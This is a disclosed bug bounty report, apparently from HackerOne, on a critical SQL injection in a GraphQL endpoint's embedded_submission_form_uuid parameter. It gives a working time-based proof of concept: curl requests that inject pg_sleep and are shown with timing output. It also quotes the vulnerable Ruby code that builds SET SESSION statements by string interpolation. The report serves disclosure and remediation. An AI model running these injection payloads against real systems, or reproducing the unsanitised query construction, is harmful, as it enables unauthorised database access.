SQL Injection in GraphQL

Endpoint
Bug 🐞 SQL Injection

Severity Critical (10.0)

Asset ☑️ GraphQL

🎉 Bounty Award None

Reported 👋🏻 Jobert Abma (jobert)

Vulnerability Description:
The embedded_submission_form_uuid parameter in the /graphql endpoint is
vulnerable to SQL injection. By manipulating this parameter, an attacker can
inject arbitrary SQL queries, potentially leading to unauthorized access or data
leakage.

Proof of Concept:
To reproduce the vulnerability:

Execute the following command with the manipulated

embedded_submission_form_uuid parameter:

Locally:

curl -X POST http://localhost:8080/graphql\?embedded_submis

sion_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30
\)%3B--%27

HackerOne.com:

curl -X POST https://hackerone.com/graphql\?embedded_submis

sion_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30
\)%3B--%27

SQL Injection in GraphQL Endpoint 1

 Additional Proof:

$ time curl -X POST https://hackerone.com/graphql\?embedded

_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_slee
p\(5\)%3B--%27
{}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total
$ time curl -X POST https://hackerone.com/graphql\?embedded
_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_slee
p\(1\)%3B--%27
{}curl -X POST 0.03s user 0.01s system 2% cpu 1.631 total
$ time curl -X POST https://hackerone.com/graphql\?embedded
_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_slee
p\(10\)%3B--%27
{}curl -X POST 0.02s user 0.01s system 0% cpu 10.557 tota
l

Impact:
The SQL injection appears to execute within the context of the secure schema.
While the full impact is currently unknown, given the ability for an attacker to
potentially switch schemas, it should be considered as having a high impact on
confidentiality.

Impacted Data:
No exploitation of the vulnerability has been detected. Further details can be
found in the report below.

Root Cause:
The vulnerability stems from the decision to use GraphQL parameters, which
were not properly sanitized, instead of input fields when introducing the
embedded submission form feature. Below is a snippet of the vulnerable code:

unless database_parameters_up_to_date
safe_query = ''

new_parameters.each do |key, value|

😮
safe_query += "SET SESSION #{key} TO #{value};" # <--

SQL Injection in GraphQL Endpoint 2

 end

begin
connection.query(safe_query)
rescue ActiveRecord::StatementInvalid => e
# NOTE: when the transaction is aborted, we cannot set
or reset any parameters.
# Changes of previous SET statements are undone as wel
l, so we can safely do
# nothing here
raise e unless e.cause.is_a? PG::InFailedSqlTransaction
end
end

The usage of parameters in PostgreSQL queries is necessitated by the

database having two separate schemas: the public schema and the secure
schema. GraphQL queries default to the secure schema, which returns data
based on user authorization. Despite this, the vulnerability poses a risk to
confidentiality.

Recommendations:
Immediately patch the vulnerability by implementing proper parameter
sanitation in GraphQL queries.

Conduct a thorough security review to identify and address any similar

vulnerabilities in the system.

Consider restricting access to sensitive endpoints or implementing

additional authentication measures to mitigate potential risks.

Reference:
https://hackerone.com/reports/435066

SQL Injection in GraphQL Endpoint 3